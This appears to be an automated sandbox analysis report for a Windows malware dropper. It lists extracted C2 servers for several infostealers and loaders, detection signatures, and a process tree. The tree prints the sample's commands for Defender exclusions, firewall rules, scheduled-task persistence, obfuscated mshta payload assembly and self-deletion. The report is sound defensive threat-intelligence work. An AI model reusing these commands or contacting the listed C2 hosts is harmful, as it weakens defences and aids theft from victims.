Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
10/11/2021, 14:50
211110-r7nbvaeddr 1008/11/2021, 16:12
211108-tnmmbahgaj 1008/11/2021, 15:26
211108-svdsbaccf6 1008/11/2021, 14:48
211108-r6lfvshdfn 10Analysis
-
max time kernel
31s -
max time network
172s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
08/11/2021, 14:48
General
-
Target
db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe
-
Size
4.6MB
-
MD5
c7f1d6db5efddf8b46441be0edfaadfd
-
SHA1
e27a2fab7ac49b1709c8d9e0183b020f1be61fc6
-
SHA256
db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12
-
SHA512
856e4f8a48848b5ddc42af7c282fdbc87df641665c0a0fdb28d5af2b6ac3299d9ae3c9b9d25b145816092abd248df32c9ea4f72ea59217b50460d48fb95ecb9a
Score
10/10
Malware Config
Extracted
Family
socelars
C2
http://www.iyiqian.com/
http://www.hbgents.top/
http://www.rsnzhy.com/
http://www.efxety.top/
Extracted
Family
raccoon
Botnet
2f2ad1a1aa093c5a9d17040c8efd5650a99640b5
Attributes
-
url4cnc
http://telegatt.top/oh12manymarty
http://telegka.top/oh12manymarty
http://telegin.top/oh12manymarty
https://t.me/oh12manymarty
rc4.plain
rc4.plain
Extracted
Family
redline
Botnet
media18
C2
91.121.67.60:2151
Extracted
Family
redline
Botnet
fucker2
C2
135.181.129.119:4805
Extracted
Family
smokeloader
Version
2020
C2
http://directorycart.com/upload/
http://tierzahnarzt.at/upload/
http://streetofcards.com/upload/
http://ycdfzd.com/upload/
http://successcoachceo.com/upload/
http://uhvu.cn/upload/
http://japanarticle.com/upload/
rc4.i32
rc4.i32
Extracted
Family
vidar
Version
47.9
Botnet
937
C2
https://mas.to/@kirpich
Attributes
-
profile_id
937
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 7 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata: ET MALWARE FormBook CnC Checkin (GET)
-
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil
suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil
-
Vidar Stealer 2 IoCs
-
ASPack v2.12-2.42 6 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Downloads MZ/PE file
-
Executes dropped EXE 19 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Loads dropped DLL 8 IoCs
-
Themida packer 1 IoCs
Detects Themida, an advanced Windows software protection system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 5 IoCs
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 3 IoCs
-
Kills process with taskkill 8 IoCs
-
Suspicious behavior: EnumeratesProcesses 17 IoCs
-
Suspicious use of AdjustPrivilegeToken 40 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe"C:\Users\Admin\AppData\Local\Temp\db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0A4EC006\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS0A4EC006\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue1607c6ec89.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0A4EC006\Tue1607c6ec89.exeTue1607c6ec89.exe5⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue160598ce8b05.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0A4EC006\Tue160598ce8b05.exeTue160598ce8b05.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\7129848.exe"C:\Users\Admin\AppData\Roaming\7129848.exe"6⤵
-
-
C:\Users\Admin\AppData\Roaming\4375421.exe"C:\Users\Admin\AppData\Roaming\4375421.exe"6⤵
-
-
C:\Users\Admin\AppData\Roaming\4316755.exe"C:\Users\Admin\AppData\Roaming\4316755.exe"6⤵
-
-
C:\Users\Admin\AppData\Roaming\4915376.exe"C:\Users\Admin\AppData\Roaming\4915376.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
-
-
-
C:\Users\Admin\AppData\Roaming\7797196.exe"C:\Users\Admin\AppData\Roaming\7797196.exe"6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL" ). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Roaming\7797196.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF """" == """" for %Z iN ( ""C:\Users\Admin\AppData\Roaming\7797196.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Roaming\7797196.exe" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "" == "" for %Z iN ( "C:\Users\Admin\AppData\Roaming\7797196.exe" ) do taskkill -f -Im "%~NXZ"8⤵
-
C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL" ). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF ""-P1jBMdKQQ16j1dp4oT~i "" == """" for %Z iN ( ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "-P1jBMdKQQ16j1dp4oT~i " == "" for %Z iN ( "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ) do taskkill -f -Im "%~NXZ"11⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRipT: CLOse ( createoBJECt ( "wScRIpt.shelL" ). RUn ("cMd /C EChO | SEt /p = ""MZ"" > CPkPI.i & CopY /b /Y CPkpI.I + sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K & Del /Q * " , 0 ,tRue ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C EChO | SEt /p = "MZ" > CPkPI.i & CopY /b /Y CPkpI.I + sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K & Del /Q *11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EChO "12⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>CPkPI.i"12⤵
-
-
C:\Windows\SysWOW64\control.execontrol ..\WfNRfms4.K12⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\WfNRfms4.K13⤵
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -Im "7797196.exe"9⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\5640685.exe"C:\Users\Admin\AppData\Roaming\5640685.exe"6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue16497809b6bd.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0A4EC006\Tue16497809b6bd.exeTue16497809b6bd.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\jGFPVLOnImpBuZRPuZ3dIM7E.exe"C:\Users\Admin\Pictures\Adobe Films\jGFPVLOnImpBuZRPuZ3dIM7E.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\XWm0oltoTPHME5Qq7BPZwxzp.exe"C:\Users\Admin\Pictures\Adobe Films\XWm0oltoTPHME5Qq7BPZwxzp.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 4007⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\63ZFS4fRIMvcWFVEKqTHY3xJ.exe"C:\Users\Admin\Pictures\Adobe Films\63ZFS4fRIMvcWFVEKqTHY3xJ.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\hyTlPCOSkuckwJcnI4Vm8myS.exe"C:\Users\Admin\Pictures\Adobe Films\hyTlPCOSkuckwJcnI4Vm8myS.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\ezwvSfLDRrzN9RNg3HEQFyHp.exe"C:\Users\Admin\Pictures\Adobe Films\ezwvSfLDRrzN9RNg3HEQFyHp.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\Kel_7Jt_XhRkcxEIxGer3YV3.exe"C:\Users\Admin\Pictures\Adobe Films\Kel_7Jt_XhRkcxEIxGer3YV3.exe"6⤵
-
C:\Users\Admin\Documents\CjLaslzGruUCQLYhVBYTl0Gn.exe"C:\Users\Admin\Documents\CjLaslzGruUCQLYhVBYTl0Gn.exe"7⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\Pictures\Adobe Films\jR0MHl8T1cX808rtWDmR3Ohz.exe"C:\Users\Admin\Pictures\Adobe Films\jR0MHl8T1cX808rtWDmR3Ohz.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\pbp578dFQtZ29o3FFEniHvLP.exe"C:\Users\Admin\Pictures\Adobe Films\pbp578dFQtZ29o3FFEniHvLP.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\8Sflrme2KR0LD1aVKmZ71Krb.exe"C:\Users\Admin\Pictures\Adobe Films\8Sflrme2KR0LD1aVKmZ71Krb.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\8Sflrme2KR0LD1aVKmZ71Krb.exe"C:\Users\Admin\Pictures\Adobe Films\8Sflrme2KR0LD1aVKmZ71Krb.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\TYxrifBL3e8yYV6pNaoVPBLn.exe"C:\Users\Admin\Pictures\Adobe Films\TYxrifBL3e8yYV6pNaoVPBLn.exe"6⤵
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\uBmgNLHyuJHZbolmMHZAqaGl.exe"C:\Users\Admin\Pictures\Adobe Films\uBmgNLHyuJHZbolmMHZAqaGl.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\5o8ceyIwE2aJ4j4u85az3AnC.exe"C:\Users\Admin\Pictures\Adobe Films\5o8ceyIwE2aJ4j4u85az3AnC.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\1lb5cX9Q8UdJnk5_9Z6ueToz.exe"C:\Users\Admin\Pictures\Adobe Films\1lb5cX9Q8UdJnk5_9Z6ueToz.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\1lb5cX9Q8UdJnk5_9Z6ueToz.exe"C:\Users\Admin\Pictures\Adobe Films\1lb5cX9Q8UdJnk5_9Z6ueToz.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\q2USX_tUTtMXBoTjrLlgXAku.exe"C:\Users\Admin\Pictures\Adobe Films\q2USX_tUTtMXBoTjrLlgXAku.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\wXxhfquqy2fYzhdeU9VLAPOJ.exe"C:\Users\Admin\Pictures\Adobe Films\wXxhfquqy2fYzhdeU9VLAPOJ.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\wXxhfquqy2fYzhdeU9VLAPOJ.exe" & exit7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 58⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\HmZrVLPozqXezv3LCvuSbvAB.exe"C:\Users\Admin\Pictures\Adobe Films\HmZrVLPozqXezv3LCvuSbvAB.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"7⤵
-
C:\Users\Admin\AppData\Local\250523.exe"C:\Users\Admin\AppData\Local\250523.exe"8⤵
-
-
C:\Users\Admin\AppData\Local\6525841.exe"C:\Users\Admin\AppData\Local\6525841.exe"8⤵
-
-
C:\Users\Admin\AppData\Local\3085145.exe"C:\Users\Admin\AppData\Local\3085145.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL" ). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Local\3085145.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF """" == """" for %Z iN ( ""C:\Users\Admin\AppData\Local\3085145.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Local\3085145.exe" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "" == "" for %Z iN ( "C:\Users\Admin\AppData\Local\3085145.exe" ) do taskkill -f -Im "%~NXZ"10⤵
-
C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL" ). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF ""-P1jBMdKQQ16j1dp4oT~i "" == """" for %Z iN ( ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "-P1jBMdKQQ16j1dp4oT~i " == "" for %Z iN ( "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ) do taskkill -f -Im "%~NXZ"13⤵
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -Im "3085145.exe"11⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\AppData\Local\6751643.exe"C:\Users\Admin\AppData\Local\6751643.exe"8⤵
-
-
C:\Users\Admin\AppData\Local\4624114.exe"C:\Users\Admin\AppData\Local\4624114.exe"8⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\WW1Soft.exe"C:\Users\Admin\AppData\Local\Temp\WW1Soft.exe"7⤵
-
-
C:\Users\Admin\AppData\Local\Temp\liuchang-game.exe"C:\Users\Admin\AppData\Local\Temp\liuchang-game.exe"7⤵
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"9⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"12⤵
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"10⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\is-675PS.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-675PS.tmp\setup.tmp" /SL5="$20468,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-RUDQP.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-RUDQP.tmp\setup.tmp" /SL5="$40258,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT10⤵
-
C:\Users\Admin\AppData\Local\Temp\is-QQOQQ.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-QQOQQ.tmp\postback.exe" ss111⤵
-
-
C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe"C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss111⤵
-
-
C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe"C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart11⤵
-
C:\7ee90f74cf88db0b855addb70b0d23\Setup.exeC:\7ee90f74cf88db0b855addb70b0d23\\Setup.exe /q /norestart /x86 /x64 /web12⤵
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵
-
-
C:\Users\Admin\AppData\Local\Temp\askinstall25.exe"C:\Users\Admin\AppData\Local\Temp\askinstall25.exe"7⤵
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"7⤵
-
-
C:\Users\Admin\AppData\Local\Temp\chrome1.exe"C:\Users\Admin\AppData\Local\Temp\chrome1.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\chrome update.exe"C:\Users\Admin\AppData\Local\Temp\chrome update.exe"7⤵
-
-
C:\Users\Admin\AppData\Local\Temp\chrome2.exe"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\zd3zBBeZWgBF3FRyTvsUkQIS.exe"C:\Users\Admin\Pictures\Adobe Films\zd3zBBeZWgBF3FRyTvsUkQIS.exe"6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\7⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \7⤵
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM7⤵
- Creates scheduled task(s)
-
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\8⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \8⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵
-
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\0lIIZ3JStvsW8nGnUHWNgBtn.exe"C:\Users\Admin\Pictures\Adobe Films\0lIIZ3JStvsW8nGnUHWNgBtn.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\E1AVjJ1TTpSf6xDjrAK4lRdS.exe"C:\Users\Admin\Pictures\Adobe Films\E1AVjJ1TTpSf6xDjrAK4lRdS.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 3167⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\2LprYkcCaAA9UlXknsAFDylZ.exe"C:\Users\Admin\Pictures\Adobe Films\2LprYkcCaAA9UlXknsAFDylZ.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\uTn3gKPE9vzGHXyuPbjrQdp1.exe"C:\Users\Admin\Pictures\Adobe Films\uTn3gKPE9vzGHXyuPbjrQdp1.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\uTn3gKPE9vzGHXyuPbjrQdp1.exe" & exit7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 58⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\GAP8ItZFo046cAQWwNxtkRwW.exe"C:\Users\Admin\Pictures\Adobe Films\GAP8ItZFo046cAQWwNxtkRwW.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\GAP8ItZFo046cAQWwNxtkRwW.exe" & exit7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 58⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ZoGPnoRCJS0l9rQfr4RwhDiI.exe"C:\Users\Admin\Pictures\Adobe Films\ZoGPnoRCJS0l9rQfr4RwhDiI.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\E0avC6RQwfLPC1Gi3NqcoFG5.exe"C:\Users\Admin\Pictures\Adobe Films\E0avC6RQwfLPC1Gi3NqcoFG5.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\ra76YP_O5QOINZCiqZy9MDWG.exe"C:\Users\Admin\Pictures\Adobe Films\ra76YP_O5QOINZCiqZy9MDWG.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\Underdress.exeC:\Users\Admin\AppData\Roaming\Underdress.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\Unseduceability.exe"C:\Users\Admin\AppData\Local\Temp\Unseduceability.exe"8⤵
-
-
-
C:\Users\Admin\AppData\Roaming\MegogoSell_crypted.exeC:\Users\Admin\AppData\Roaming\MegogoSell_crypted.exe7⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5160 -s 5568⤵
- Program crash
-
-
-
-
